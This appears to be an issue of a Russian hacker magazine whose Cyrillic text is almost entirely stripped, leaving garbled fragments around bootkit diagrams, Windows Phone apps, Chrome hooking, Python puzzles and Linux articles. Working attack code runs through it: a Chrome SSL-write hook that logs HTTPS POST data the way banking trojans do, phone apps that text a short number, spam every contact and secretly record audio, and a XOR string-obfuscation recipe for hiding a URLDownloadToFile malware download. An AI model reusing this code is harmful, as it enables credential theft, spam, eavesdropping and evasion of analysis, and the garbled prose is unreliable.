[Fig. 7, Olmasco (diagram), box labels: Call KdDebuggerInitialize1 from loaded kdcom.dll; Load VBR of malicious partition; Load ntoskrnl.exe, hal.dll, kdcom.dll, bootvid.dll etc.; Load winload.exe; Substitute EmsEnabled option with Winpe; Read bcd]
. 8. !
--! !
Carberp, -.
Carberp ,
.
, .
- Win64/Rovnix,
. Carberp Rovnix -,
.
Carberp ,
.
[Diagram labels: Continue kernel initialization; Load MBR]
. 9. Carberp
. 10. , - Carberp
(. 9).
, .
, . ,
. (
), ,
, .
:
. 11. Carberp
, , . 10.
-
(. 11).
, .
-
.
user-mode-.
, NtQueueApcThread()/NtResumeThread().
Carberp : -, , dll-,
. , , .
. ,
GMER RKU.
Carberp ,
[Fig. 12, Rovnix (flowchart), box labels: Check if already infected (success / fail); Load MBR (real mode); Check OS Version (Win 2000, Win XP, Vista/Win7); Load VBR (real mode); Target of Win64\Rovnix; Check Admin Privileges (success / fail); Determine OS Digit Capacity; Load bootmgr (real mode / protected mode); Install Corresponding Kernel mode Driver; Call ShellExecuteEx API with runas; Load winload.exe or winresume.exe; Overwrite Bootstrap Code of Active Partition]
,
x86-, x64-. 2012 , ,
.
!
- Rovnix,
, MBR.
. 12.
-, , Bootstrap-, .
Bootstrap ,
VBR (Volume Boot Record), bootmgr.
. Rovnix, Olmasco,
-, ,
Olmasco, ,
, , , , - .
,
,
.
. 13. Rovnix
, Rovnix , , MBR. , ,
, . ,
.
, SecureBoot Win8,
.
-
,
- .
,
. ,
,
-, ,
,
, . , , , . z
yurembo (yazevsoft@gmail.com)
- ,
, . ,
, MS WM6.5,
,
. !
082
INFO
MediaElement
(
mediaSound),
XAML-
: <MediaElement Height="120" Name="mediaSound" Width="160" />.
WWW
windowsphonehacker.com
,
WP
77.5.
CD
,
.
WINDOWS PHONE
, , . :)
, WP 7,
Windows
Phone Marketplace 99 . ChevronTeam ChevronWP7,
.
, .
WP 7, Mango MS WP 7.5,
, ChevronTeam . ,
. , ,
, . , ! :)
. ,
.
, ,
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\USB,
ZuneDriver, Device
.
, WP (
MS ;)), , -,
, .
WP .NET Silverlight.
,
API. SMS
.
!
, :
using System.Windows.Navigation;
, Microsoft.Phone.
Tasks, SMS (. ). , :
protected override void OnNavigatedTo(NavigationEventArgs e)
{
    SmsComposeTask msgSMS = new SmsComposeTask();
    msgSMS.Body = " -";
    msgSMS.To = "1928";
    msgSMS.Show();
}
WINDOWS PHONE
, Microsoft .
1. (
.NET Compact), , ()
.
2.
(chamber).
3.
,
, ,
.
4. . ( ,
, ,
,
?
.)
5.
Windows Phone Marketplace.
6. SSL. ,
, .
7.
ProtectedData ( -
System.Security.Cryptography),
.
8. WP 7 : AES, HMACSHA1,
HMACSHA256, Rfc2898DeriveBytes, RSA,
SHA1, SHA256.
9. , IE,
.
10. , Microsoft,
.
;
.
:)
, ,
:).
, WP 7.5
.
, ,
, . ,
.
. WP- (
, 7.5, SDK
7.1) Silverlight, C#-
Microsoft.Phone.UserData,
.
. , ,
Contacts,
. MainPage InitSearch,
contacts.SearchAsync(String.Empty, FilterKind.DisplayName, null)
.
SearchAsync : (
, ); , ( , ,
None, , ); ,
, null. -
Windows Phone
:
1.
( hash-: = ).
2. .
3. ,
LINQ, / .
,
,
.
ContactsSearchEventArgs.,
SearchCompleted,
MainPage:
contacts.SearchCompleted += new EventHandler<ContactsSearchEventArgs>(
    contacts_SearchCompleted);
:
void contacts_SearchCompleted(object sender,
    ContactsSearchEventArgs e)
{
    int max = e.Results.Count(); //-
    string adr;
    try { //
        for (int i = 0; i < max; i++)
            if (e.Results.ElementAt(i).EmailAddresses != null)
            {
                adr = e.Results.ElementAt(i).
                    EmailAddresses.First().EmailAddress; //
                if (adr != null && adr != "") //
                    SendEmail(adr); // :)
            }
    }
    catch (Exception ex) { }
}
,
, e-mail- ( ) , ,
SendEmail, .
:
void SendEmail(String adr)
{
    EmailComposeTask email = new EmailComposeTask();
    email.To = adr;
    email.Subject = "Holy mail";
    email.Body = "Download my prog";
    email.Show();
}
,
( EmailSender).
Overhear2
,
- .
, .
, . ,
! ;)
, , , ,
.
,
(Overhear2, ),
, .
,
Silverlight- WP. C#-
:
using System.IO;
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Audio;
using System.Windows.Threading;
using System.IO.IsolatedStorage;
, FrameworkDispatcher ( , ), , , ,
(
, ),
. MainPage (.
). ,
. ,
Windows Phone
, :).
, .
, . (
) .
,
, . recordingStopped ,
, , ,
( ), .
DispatcherTimer .
xna.
xna, :
DispatcherTimer dt = new DispatcherTimer();
dt.Interval = TimeSpan.FromMilliseconds(33);
, ,
: dt.Tick += new EventHandler(dt_Tick).
dt.Start() .
, ,
. ,
(, 10 000 ),
, .
,
SetupMicrophone. ,
. - ,
, , .
,
.
. , . WriteWavHeader ,
. , microphone.Start()
.
.
,
33 . ,
. , ,
recordingStopped .
,
.
( 500 ) microphone_BufferReady.
. recordingStopped , , ,
.
, : , ?
, ,
, .
, , ,
.
SaveFile() (. ), ,
.
private void SaveFile() { //
    using (IsolatedStorageFile isoStorage =
            IsolatedStorageFile.GetUserStoreForApplication()) {
        using (IsolatedStorageFileStream isoStream =
                isoStorage.CreateFile(FileName)) {
            isoStream.Write(stream.ToArray(), 0,
                    stream.ToArray().Length);
        }
    }
}
, ,
()
.
,
.
,
(dormant), ,
.
(active -> dormant)
tombstoning.
, (terminate)
. ,
:
Launching , Closing
, Deactivating (
) Activating
tombstone. ,
, .
, ,
.
,
. , wav-.
, :). wav-,
. (goo.gl/ufe3y)
, (
). !
WriteWavHeader,
, ( SetupMicrophone), UpdateWavHeader,
,
, , (
microphone_BufferReady, ,
SaveFile).
wav-. ,
microphone_BufferReady (
recordingStopped), PlayFile
.
:
private void PlayFile() { //
    using (var isf =
            IsolatedStorageFile.GetUserStoreForApplication()) {
        if (isf.FileExists(FileName)) {
            using (var isoStream = isf.OpenFile(FileName,
                    FileMode.Open, FileAccess.Read)) {
                mediaSound.Stop();
                mediaSound.SetSource(isoStream);
                mediaSound.Position=System.TimeSpan.FromSeconds(0);
                mediaSound.Volume = 20;
                mediaSound.Play();
            }
        }
    }
}
Overhear
,
.
mediaSound.
,
, .
,
.
: , , ( )
( ). Play :
sound = new SoundEffect(stream.ToArray(),
microphone.SampleRate, AudioChannels.Mono);
sound.Play();
! , : , Windows Phone
, . !
WP 7 .
, ,
. :
1. The Trusted Computing Base (TCB)
.
, - , .
, ,
,
Windows Phone Marketplace,
.
2. The Elevated Rights Chamber (ERC) .
,
, ,
.
.
3. The Standard Rights Chamber (SRC)
, MS Office
Mobile, Internet Explorer 9 . .
4. The Least Privileged Chamber (LPC) ,
Microsoft.
, .
Preview
088
GOOGLE CHROME
,
.
Internet Explorer Mozilla Firefox
.
Google Chrome
, , . -,
,
,
.
094
,
. Python!
UNIXOID
108
Fedora
.
?
SYN\ACK
114
DLP-. - .
110
Linux-,
.
FERRUM
124
Django-
? .
130
!
. ,
.
(seserega@gmail.ru, blotlore.blogspot.com)
Google Chrome
GOOGLE
WWW
goo.gl/Cj4Pl
OllyDbg
.
goo.gl/rdAfo
,
IDA.
goo.gl/uIqMb
,
Chrome.
goo.gl/sZWwZ
.
INFO
__declspec(naked),
.
,
. Internet
Explorer Mozilla Firefox
.
Google Chrome ,
.
. 1. OllyDbg
, ,
. IE , HttpSendRequest,
wininet.dll, Firefox PR_Write nspr4.dll, ,
.
. 2. SSL-
SRV*c:\code\symbols*http://msdl.microsoft.com/download/symbols;SRV*c:\code\symbols*http://chromium-browser-symsrv.commondatastorage.googleapis.com
4.
5.
6.
7.
c:\code\symbols ,
.
View.
Command, Registers Disassembly.
Chrome.
File Attach to a Process...
chrome.exe .
x chrome*!* SSLClientSocketNSS::Write
( Command)
SSLClientSocketNSS::Write, SSLClientSocketWin::Write. (breakpoints) Gmail-.
SSLClientSocketNSS
::Write.
,
int SSLClientSocketNSS::Write(
    IOBuffer* buf,
    int buf_len,
    const CompletionCallback& callback
)
,
POST-. ,
IOBuffer:
class NET_EXPORT IOBuffer :
    public base::RefCountedThreadSafe<IOBuffer>
{
public:
    IOBuffer();
    explicit IOBuffer(int buffer_size);
    char* data() { return data_; }
protected:
    friend class base::RefCountedThreadSafe<IOBuffer>;
    explicit IOBuffer(char* data);
    virtual ~IOBuffer();
    char* data_;
};
, -
. 3. SSL-
,
. OllyDbg
SSLClientSocketNSS::Write (. 1),
DWORD (. 2).
, DWORD ( IOBuffer+8) (char*),
HTTPS- (. 3).
, POST , . ,
SSLClientSocketNSS::Write (. 4).
POST , .
.
,
, .
, ,
, , GetProcAddress
.
PE-, , chrome.exe
chrome.dll. ,
SSLClientSocketNSS::Write dll.
, .
090
- .
. (
, )
14 , chrome.dll .
chrome_1c30000!net::SSLClientSocketNSS::Write:
02875a4c 55              push    ebp
02875a4d 8bec            mov     ebp,esp
02875a4f 51              push    ecx
02875a50 53              push    ebx
02875a51 56              push    esi
02875a52 57              push    edi
02875a53 ff7508          push    dword ptr [ebp+8]
02875a56 8bf1            mov     esi,ecx
02875a58 33db            xor     ebx,ebx
(BYTE*),
, . ,
. ?, x.
. 4. SSLClientSocketNSS::Write
:
char* Sign = "\x55\x8B\xEC\x51\x53\x56\x57\xFF\x75\x08"
             "\x8B\xF1\x33\xDB"; // SSLClientSocketNSS::Write
char* Mask="xxxxxxxxxxxxxx"; //
DWORD SSLAdr = FindPattern(ChromeDLL,
                           Chrome32Size,
                           (BYTE*)Sign,
                           Mask); // SSLAdr - SSLClientSocketNSS::Write
:
bool DataCompare( const BYTE* pData,
                  const BYTE* bMask, const char* szMask )
{
    for( ; *szMask; ++szMask, ++pData, ++bMask )
    {
        if( *szMask == 'x' && *pData != *bMask )
            return false;
    }
    return ( *szMask ) == NULL;
}
DWORD FindPattern ( DWORD dwAddress,
                    DWORD dwSize, BYTE* pbMask, char* szMask )
{
    for( DWORD i = NULL; i < dwSize; i++ )
    {
        if(DataCompare((BYTE*)(dwAddress+ i),pbMask,szMask))
            return (DWORD)( dwAddress + i );
    }
    return 0;
}
- , is f*cking unstable.
, , .
K, , .
. , , ,
. , , 5 JMP _.
5 ,
JMP. . ,
, , .
. ,
JMP , .
.
.
PAGE_EXECUTE ( VirtualProtect),
5 ( )
. 5 ,
asm- ,
. ,
, -
.
, JMP, [ +
]. ,
JMP _.
,
,
( ).
-, ,
:
. ,
openws akademiker
PR_Write ( - ),
Chrome
Zeus ( , ).
PR_Write
//
char* Sign = "\x8b\x4c\x24\x04\x57\xe8\x00\x00\x00\x00\x8b"
             "\xf8\x85\xff\x75\x05\x83\xc8\xff\x5f\xc3\x53\x56\x8b\xb7"
             "\x38\x02\x00\x00";
//
char* Mask="xxxxxx????xxxxxxxxxxxxxxxxxxx";
, PR_Write
, combined_methods, ,
WinDBG SSLClientSocketNSS::DoPayloadWrite (. 5).
,
. ,
combined_methods PR_Write
0Ch . SpyEye
, .
TranslateMessage, ,
, ZwReadFile,
(
goo.gl/xTX9j). , .
. 5. Combined_methods SSLClientSocketNSS::DoPayloadWrite
    __asm
    {
        push ebp;
        mov ebp,esp;
        push ebx;
        push esi;
        push edi;
        push ecx;//argument
    }
    //
    //
    ChromeHook.UnsetSplicing();
    TrueSSLWrite = (SSLWrite)ChromeHook.GetHookedFunc();
    //
    __asm
    {
        pop ecx;//argument
        mov eax,callback;
        push eax;
        mov eax,buf_len;
        push eax;
        mov eax,buf;
        push eax;
        call TrueSSLWrite;
        push eax;
    }
    //
    ChromeHook.ReSplice();
    if((strncmp((LPCSTR)*(char**)(buf+8),
        "POST",lstrlen("POST"))==0))
    {
        WriteLog(LogFile,*(char**)(buf+8));
        IsPostData=true;
    }
    else if ((strncmp((LPCSTR)*(char**)(buf+8),
        "GET", lstrlen("GET"))==0)|| IsPostData)
    {
        WriteLog(LogFile,*(char**)(buf+8));
        IsPostData=false;
    }
    __asm
    {
        pop eax;
        pop edi;
        pop esi;
        pop ebx;
        leave;
        ret 0Ch;
    }
}
__declspec(naked) , ,
ex. , ,
, .
thiscall,
(
Write SSLClientSocketNSS). ecx
,
.
-
( DLL-) !
Google Chrome , ,
.
. , ,
. . z
>> coding
/++
( )
,
.
, ,
, .
.
WWW
Cog
:
nedbatchelder.com/
code/cog.
INFO
,
python-
cog.
.
,
.
? , , ? , ():
URLDownloadToFile(NULL, "http://malwareserver.com/test.exe",
"C:\\test.exe", 0, NULL);
,
URLDownloadToFile,
.rdata .data . hex- . , ,
, - :
URLDownloadToFile(
NULL,
Decrypt("\x0E\x12\x12\x16\x5C ..."),
Decrypt("\x25\x5C\x3A\x12\x03 ..."),
0,
NULL);
,
. - , ,
, .
,
, . (
), - .
PYTHON
, , , -
Cog (http://pypi.python.org/pypi/cogapp).
,
. , , Cog
,
,
. , Cog :
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
//[[[end]]]
...
:
// ++
...
/*[[[cog
import cog
fnames = ['DoSomething', 'DoAnotherThing', 'DoLastThing']
for fn in fnames: cog.outl("void %s();" % fn)
]]]*/
void DoSomething();
void DoAnotherThing();
void DoLastThing();
//[[[end]]]
...
, Visual
Studio , . ,
Encrypt cog-, .
BIN2H
[[[cog ]]] ,
,
]]] [[[end]]]. Cog ,
,
.
, , ,
. ,
.
out outl ( out, ) cog.
,
python-. ,
.
. Cog
xor:
/*[[[cog
import cog
key = 0x66
def Encrypt(str):
    cog.out('Decrypt("')
    cog.out("".join(['\\x%02X' % (ord(char)^key)
        for char in str]))
    cog.out('")')
]]]
[[[end]]]*/
URLDownloadToFile Encrypt:
URLDownloadToFile(
NULL,
//[[[cog Encrypt("http://malwareserver.com/test.exe")]]]
/*[[[end]]]*/,
//[[[cog Encrypt("C:\\test.exe")]]]
/*[[[end]]]*/,
0,
NULL);
, . , Cog
bin2h . bin2h
, , :
def bin2h(filename, valuename):
    data = open(filename, 'rb').read()
    cog.outl('BYTE %s[] = {' % valuename)
    for byte in data:
        cog.out('0x%02X, ' % ord(byte))
    cog.outl('};')
    cog.outl('DWORD %s_size = %d;' % (valuename, len(data)))
, (
PE-), :
//[[[cog bin2h("test.bin", "test")]]]
/*[[[end]]]*/
:
//[[[cog bin2h("test.bin", "test")]]]
BYTE test[] = {
0x23, 0x69, 0x6E, 0x63, 0x6C ...
//
};
DWORD test_size = 7079;
/*[[[end]]]*/
bin2h
.
, ,
.
, , API . c CorePy
, -
. z
(ivinside.blogspot.com)
,
.
, .
-.
40
...
, .
- . :
, .
, .
?
... !
... ? .
?
, ,
-- .
!
, .
, . ... ( )
!
?
, ,
, , --
. : . :) .
13:
, .
, ,
. , , ,
, , .
.
. ,
?
1 * 1 * 11 = 11
1 * 2 * 10 = 20
1 * 3 * 9 = 27
1 * 4 * 8 = 32
1 * 5 * 7 = 35
1 * 6 * 6 = 36
2 * 2 * 9 = 36
2 * 3 * 8 = 48
2 * 4 * 7 = 56
2 * 5 * 6 = 60
3 * 3 * 7 = 63
3 * 4 * 6 = 72
3 * 5 * 5 = 75
4 * 4 * 5 = 80
, . ,
: 1*6*6 2*2*9. ,
, 36,
, ,
. ,
, , ,
. : ,
.
, .
, , .
(1-6-6 2-2-9) .
, , .
( ). :
,
Python.
Oracle.
cx_Oracle,
Oracle.
, ,
:
, ;
, ;
,
.
, , .
, :
,
;
,
.
,
, . ,
:
1.
2.
, ,
, .
Oracle
. , , .
.
test1 test2,
( )
- :
CREATE TABLE test1(prod VARCHAR(10), price INT);
CREATE TABLE test2(prod VARCHAR(10), price INT);
import cx_Oracle
# Connect to the database
conn = cx_Oracle.connect('system/qwerty@XE')
cur = conn.cursor()
# Insert every line of the file
for line in open('file.txt'):
    cur.execute("INSERT INTO test VALUES (:s)", s=line)
# Commit the changes, then close the cursor
cur.execute('COMMIT')
cur.close()
,
, .
.
JOIN,
.
LEFT JOIN ,
(), ,
().
. ,
.
WHERE test2.prod IS NULL, , , .
:
SELECT test1.* FROM test1 LEFT JOIN test2
ON test1.prod=test2.prod AND test1.price=test2.price
WHERE test2.prod IS NULL;
,
JOIN, , ,
, -
1. ,
,
, None,
.
>>> a = ["a","b","c"]
>>> b = [1, 2]
>>> print dictify(a,b)
{"a": 1, "b": 2, "c": None}
. .
,
. ,
, ,
. .
, - .
:
. ,
.
, .
2. :
def myappend(a = [], num = 0):
    a.append(num)
    print a
,
:
>>> a = [1,2,3]
>>> myappend(a)
>>> myappend()
>>> myappend()
>>> a = {1:2, 3:4}
>>> myappend(*a)
>>> myappend(**a)
3. , .
>>> a = Keeper()
>>> b = Keeper()
>>> for i in Keeper.list_instances(): print i
<Keeper instance at 0x...
4. ?
389/tcp open ldap
, .
, *nix,
, chkrootkit.
, , . Chkrootkit
,
.
rkhunter unhide.
, .
http://goo.gl/9HXEt.
GMER RootRepeal.
, , - ,
.
(IDS intrusion detection system).
. ,
.
Snort
Suricata. , , .
- -
(WAF web application firewall),
.
,
.
,
. , .
.
, . ?
, ,
, .
( ,
. .), .
, ,
,
, .
, : l = 2 * pi * R,
R . ,
. R,
l/2, pi * R.
, , ,
3,14 , , , ,
. , .
, , - ! ,
: , ?
,
: , .
:
3 + 5 = 8
5 + 7 = 12
7 + 11 = 18
...
, ,
,
, .
,
, , .
, . ,
,
( , r < 3/pi * R/4) ,
. ,
. ,
R/4 , . , ,
l/2, 12,56 (2 * 3,14 * 4/2). ,
, ,
, !
r < 3/pi * R/4 , ,
.
!
P. S. :
1. ?
2.
?
c , URL (
URL), N . N, , 10.
.
threading,
eventlet, gevent, Twisted .
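.
, .
. , .
, , . ( ,
):
1. (, ).
2. , .
3. .
4.
.
: , ,
(). . .
, , .
threading:
import sys
import threading
import Queue
import urllib2

# Worker thread: takes URLs from the shared queue and saves each page
class DownloadThread(threading.Thread):
    def run(self):
        # Request headers
        headers = {'User-Agent':
            'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'}
        while True:
            try:
                # get_nowait() does not block if another thread has
                # emptied the queue in the meantime
                number, url = urlsPool.get_nowait()
            except Queue.Empty:
                break
            # Build the request
            req = urllib2.Request(url, None, headers)
            # Save the response body to a file named after the URL's number
            logfile = open(str(number), 'w')
            logfile.write(urllib2.urlopen(req).read())
            logfile.close()

# Check the command-line arguments
if len(sys.argv) < 2:
    print ('Usage: downloader.py [-n <number>] FILE\n'
           '"-n <number>" - number of threads (default 10)')
    sys.exit(1)
# Number of threads
if len(sys.argv) == 4 and sys.argv[1] == '-n':
    threads = int(sys.argv[2])
else:
    threads = 10
# Queue of URLs
urlsPool = Queue.Queue(0)
# Fill the queue with the URLs from the file
urlsFile = open(sys.argv[-1], 'r')
for number, url in enumerate(urlsFile):
    url = url.strip()
    if url:
        urlsPool.put((number, url))
urlsFile.close()
# Start the threads
for x in xrange(threads):
    DownloadThread().start()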
, .
,
. :
? .
100 . :
I : 900
II : 1000 + 100
:
I : 900 + 100
II : 1000 + 100 100
, 10 1
100/11 1000/11 . ( ):
I : (900 + 100/11) + 1000/11
II : (1000 1000/11) + (100 10/11)
:
I : 909,09 + 90,91
II : 909,09 + 90,91
, !
: ,
, ,
. z
deeonis (deeonis@gmail.com)
.
,
.
.
, ,
.
,
, . HTML-
,
. ,
, -, -
. , , HTML-
.
, .
, . , HTML-
. , - ,
. ,
, . ,
-, ,
.
, , - , ,
,
. -
. ,
. ,
, , -
.
, .
( HTML)
//
class IHTMLParser
{
public:
    // ...
    virtual char* getTags() = 0;
    // ...
};
// ,
class HTMLParser : public IHTMLParser
{
public:
    // ...
    char* getTags() {
        //
    }
    // ...
};
//
IHTMLParser *parser = new HTMLParser();
parser->getTags();
, .
HTMLParser, . , ,
.
ModernHTMLParser,
IHTMLParser. ,
, IHTMLParser, .
.
ModernHTMLParser
class ModernHTMLParser
{
public:
    // ...
    std::vector<char*> getHtmlTags();
    // ...
};
// , IHTMLParser
class HTMLAdapter : public IHTMLParser
{
private:
    ModernHTMLParser &m_modernParser;
public:
    // a reference member has to be bound in the initializer list
    HTMLAdapter(ModernHTMLParser &parser)
        : m_modernParser(parser)
    {
    }
    char* getTags() {
        // ...
        m_modernParser.getHtmlTags();
        // ...
    }
    // ...
};
//
ModernHTMLParser modernParser;
IHTMLParser *parser = new HTMLAdapter(modernParser);
parser->getTags();
CLIENT
.
, HTMLAdapter ModernHTMLParser.
,
, .
, . , , , getTags() HTMLParser HTML-,
, getHtmlTags()
ModernHTMLParser , ,
getTags HTMLAdapter .
class HTMLAdapter : public IHTMLParser
{
private:
    ModernHTMLParser &m_modernParser;
public:
    HTMLAdapter(ModernHTMLParser &parser)
        : m_modernParser(parser)
    {
    }
    char* getTags() {
        // ...
        std::vector<char*> vectorOfTags = m_modernParser.getHtmlTags();
        //
        return vector2array(vectorOfTags);
    }
    // ...
};
[Diagram (Adapter pattern): Target +request(); Adapter +request(), adaptee; Adaptee specificRequest()]
, , , , .
,
-
. ,
,
.
,
.
. ,
,
.
class HTMLAdapter :
    public HTMLParser, public ModernHTMLParser
{
public:
    char* getTags() {
        // , getHtmlTags(),
        //
        std::vector<char*> vectorOfTags = getHtmlTags();
        //
        return vector2array(vectorOfTags);
    }
    // ...
};
, ,
HTMLParser, .
HTMLAdapter
, , ,
HTMLParser. , HTMLParser2,
IHTMLParser,
.
, ,
-
.
. ,
.
class SystemClass1
{
public:
    void methodA();
    // ...
};
class SystemClass2
{
public:
    void methodB();
    // ...
};
class SystemClass3
{
public:
    void methodC();
    // ...
};
class Facade
{
private:
    SystemClass1 &m_sc1;
    SystemClass2 &m_sc2;
    SystemClass3 &m_sc3;
public:
    Facade(SystemClass1 &sc1,
           SystemClass2 &sc2, SystemClass3 &sc3)
        : m_sc1(sc1), m_sc2(sc2), m_sc3(sc3)
    {
    }
    void method()
    {
        m_sc1.methodA();
        m_sc2.methodB();
        m_sc3.methodC();
    }
};
[Diagram (Facade pattern), class names: SubsystemThree; SubsystemTwoWrapper (+primeTheDirective()); PlasmaConduit; Holodeck; WarpCore; JefferiesTube; DilithiumChamber; Transporter; TurboLift; PhaserBack; Weapon; PhotonTorpedo]
C#
Facade, HTMLAdapter, . ,
, .
,
. . .
HTMLParser , Facade
.
, , - .
, , , .
, , . .,
, -
.
, -
.
, .
,
, , . , ,
,
Facade, .
.
: .
.
- , ,
.
, . z
UNIXOID
(execbit.ru)
LINUX
,
,
,
.
, ,
, .
, ,
- .
, ,
.
,
,
INFO
TrueCrypt,
,
-
.
Haven
,
.
,
200 .
,
. ,
:
,
, .
. ,
/ .
. , -
, .
. ,
,
.
.
,
: Ubuntu Privacy Remix, Privatix, The
Haven Project, Tails Liberte Linux.
- , ,
,
. ,
,
grsecurity.
,
, , dmesg , root,
chroot-,
/proc,
.
grsecurity ( ,
2010
), .
grsecurity
PaX,
(, ),
.
Liberte Linux,
Hardened Gentoo,
.
SELinux AppArmor
(
, ).
, ( )
.
AppArmor quantOS, , ,
.
-
Liberte Linux
.
,
-
,
,
. QubesOS,
(
, ][_07_2010).
Liberte
. ,
, ,
.
LiveCD, ,
, RAM-,
. , , ,
.
TrueCrypt LUKS/dm-crypt,
.
,
Ubuntu, Fedora
. Tails (The Amnesiac Incognito Live
System) Liberte Linux,
, .
,
,
.
.
TrueCrypt
. , Haven (www.haven-project.org).
. Privatix
UsbCryptFormat
CryptBackup
.
Ubuntu Privacy
Remix (www.privacy-cd.org),
,
( LAN/WLAN/Bluetooth
). -
GnuPG, Nautilus
,
( Haven
Seahorse).
TrueCrypt-
( )
, (,
, OpenOffice, GnuPG
. .).
- .
,
,
. , Tails MAT (mat.boum.org),
(, . .),
. Haven , ,
,
(
UNIXOID
).
Nautilus,
, ,
.
,
.
.
,
. , Ubuntu Privacy Remix
,
Bluetooth -.
Linux, ,
.
,
.
Tor,
,
.
Tor
,
. , Tor
,
?
Tails Haven
: Tor-,
. Liberte
Linux , , ,
,
IP-
Haven OS
.
Liberte Linux
:
Tor
(, , torify),
.
IP-,
Tor.
:
DHCP- Tor- HTTP(S)-;
ping ;
VPN-;
, ,
.
DHCP
, ,
ARP IPv4LL .
Wi-Fi, MAC.
, Liberte Linux
MAC-
.
,
: Gnome,
LXDE Fluxbox, Firefox, claws-mail, Abiword . .,
. - .
,
, ,
.
Tails,
, ,
. , -
Tor- Vidalia (www.torproject.org/
projects/vidalia), /
Tor-,
Tor ,
. .
Firefox,
-:
torbutton,
-
JavaScript-, Flash . .;
FireGPG (getfiregpg.org), gpg-
-, ,
;
HTTPS Everywhere (www.eff.org/
WINDOWS
Haven
,
Windows
.
100 ,
. Windows
,
,
, 100 .
,
.
https-everywhere),
HTTPS, .
Haven,
.
:
RefControl HTTP HTTP-referrer,
, ,
.
CookieSafe
.
AdBlock Plus .
RequestPolicy (
CSRF-).
Perspectives
SSL.
Aircrack-ng
Wi-Fi-
, (,
PWGen Tails). X-chat GPA
(GNU Privacy Assistant: gpa.wald.intevation.org),
SASL (ygrek.org.ua/p/cap_sasl.html)
Tor.
Liberte Linux Figaros Password
Manager 2 (ls.regnet.cz/fpm2/),
AES-256.
(Florence: florence.sf.net), ,
-
. , ,
,
, ,
Tor
Liberte: Tor
.
Hardened Gentoo,
.
, SSP (
) ASLR ( ).
, .
,
. Haven
,
. ,
, .
Tor, , ( NetworkManager)
Applications Start Network.
Haven
Tor browser bundle (
Firefox Tor) Windows.
(
)
(Application Haven Copy Windows
Tools), ,
. Haven
.
USB-,
Applications Haven
Haven Installer,
. ,
. , Haven
,
(
).
Liberte Linux
.
slock (tools.suckless.org/slock).
.
<Alt + Fx>,
.
Linux SysRq, X- .
Liberte
, .
,
,
iptables,
-.
. , ,
,
.
,
. Cold
boot, ,
/
,
.
, .
, .
-
. z
UNIXOID
hatchet
hatchet (maks.hatchet@yandex.ru)
-
FEDORA
Fedora
. Fedora 14
Systemd, Fedora 15 SETUID-
Capabilities,
GRUB2
HAL.
,
UNIX.
Fedora Gnome 3
SYSTEMD
SysV,
UNIX,
,
.
,
.
,
,
,
- , DoS-
.
, cut,
grep, awk . . ,
, .
, Systemd,
.
,
.
,
- .
Systemd Fedora 14
, /
. Fedora 16 (
).
CAPABILITIES VS SETUID
SETUID-
. - ping
, . ,
ping SETUID-, root, ,
(RAW) . ,
ping
, ,
ping,
ftp ,
root-.
? SELinux?
, ,
. ,
root, RAW-
?
. , Capabilities!
Capabilities? ,
SETUID, , , ,
,
Fedora,
,
UNIX. , /usr/bin,
, , /bin,
/sbin, /usr/sbin, /lib,
/usr/lib. , . , ,
, /bin, /sbin /lib
, , /usr (
NFS).
/usr
,
, , ,
/usr-
Systemd
Fedora btrfs
, , btrf-.
, ,
,
, ,
, , LSB
,
.
(
COW ),
-,
. Fedora 16 GRUB2,
(GRUB /
),
UNICODE .
HAL (Hardware
Abstraction Layer), udev udisks upower,
(
) .
HAL
.
Fedora 16 virt-sandbox, .
selinux-sandbox,
,
libvirt, LXC
QEMU/VirtualBox.
Trusted Boot,
, ,
, .
,
,
.
USB- ,
, , web .
Fedora 14 Spice QEMU.
: ,
,
. z
15- Fedora
firewalld, ,
.
D-BUS, .
firewall-cmd, ,
, IP-
:
$ firewall-cmd --enable --service=ssh
$ firewall-cmd --enable \
--service=samba --timeout=10
$ firewall-cmd --disable \
--service=ipp-client
Capabilities Linux
Fedora 15 CloudFS,
GlusterFS, . CloudFS
,
Linux-
.
Fedora 15 ,
:
((e)mbedded (m)otherboard)
em0,
em1, em2 . ., ,
PCI, pci1#2,
1 PCI-, 2 .
15- , Fedora btrfs
. Btrfs
UNIXOID
(zobnin@gmail.com)
LINUX
, ,
. Gmail,
YouTube, GDocs -,
. -,
?
,
? , -,
Google Chrome OS? , , ,
Plan9,
?
, ,
, ,
.
.
Linux (Ubuntu One),
YouTube
(Totem, ,
),
- ( KDE
Google Gadgets)
-.
,
Linux-.
,
-
-. Twitter, ,
,
,
, , .
.
,
. ?
Twitter-.
-
Linux
. Twitter-
Gwibber, , ,
Identi.ca, StatusNet, Facebook, Flickr, Digg,
FriendFeed Qaiku. ,
, , Gnome.
Tyrs Twitter-
, ,
Pino Hotot.
,
. TweetDeck
Twitter-,
.
Adobe AIR,
. IM-
Pidgin Twitter-
( pidgin-twitter).
, :
.
.
Twitter- ncurses.
Linux- Greg Kroah-Hartman.
bti , , :
$ echo "My current uptime is $(uptime)" | bti
,
,
OAuth-, . (twitter.com/
apps/new) Consumer Key
Consumer Secret bti:
$ vi ~/.bti
# Consumer key
consumer_key=cZy8DdioswAfu3LJYg6E2w
# Consumer secret
consumer_secret=fnIGGU0T12mMWKjmThUdSeKN32NLWfmnwapwubVQ
bti. ,
PIN.
bti,
access_token_key access_token_
secret, . bti ,
.
YouTube
Google-
, ,
. Gnome
Totem. KDE4
minitube,
,
-. KDE,
. youtube-viewer,
MPlayer.
youtube-viewer,
,
.
.
( '-t'),
('-a'), - ('-p')
('-M'). '-2', '-3', '-4', '-7', '-1' (240p, 360p,
480p, 720p 1080p ).
'-sub=ru' MPlayer
.
(50 20),
'-m'. youtube-viewer
YouTube.
, MPlayer
.
HD-,
flash-
, MPlayer -
.
,
( , , ). youtube-viewer
videotop, ncurses- vi-
.
:
.
( -
- , ),
. ,
Gmail, CheckGmail Gmail Notifier.
.
Gmail. KDE4
kdeplasma-gmailnotifier. ,
, ( ,
),
, KDE
.
.
sup,
Mutt.
translator, //
, cliweather,
.
, ,
notify-send:
$ notify-send \
'cliweather -'
cron (, ,
).
-
GOOGLE DOCS
FS UBUNTU
$ sudo add-apt-repository ppa:doctormo/ppa
$ sudo apt-get update
$ sudo apt-get install google-docs-fs
UNIXOID
GDataCopier, Google Docs.
: gls
, gcp , gmkdir
grm gmv
.
. ,
:
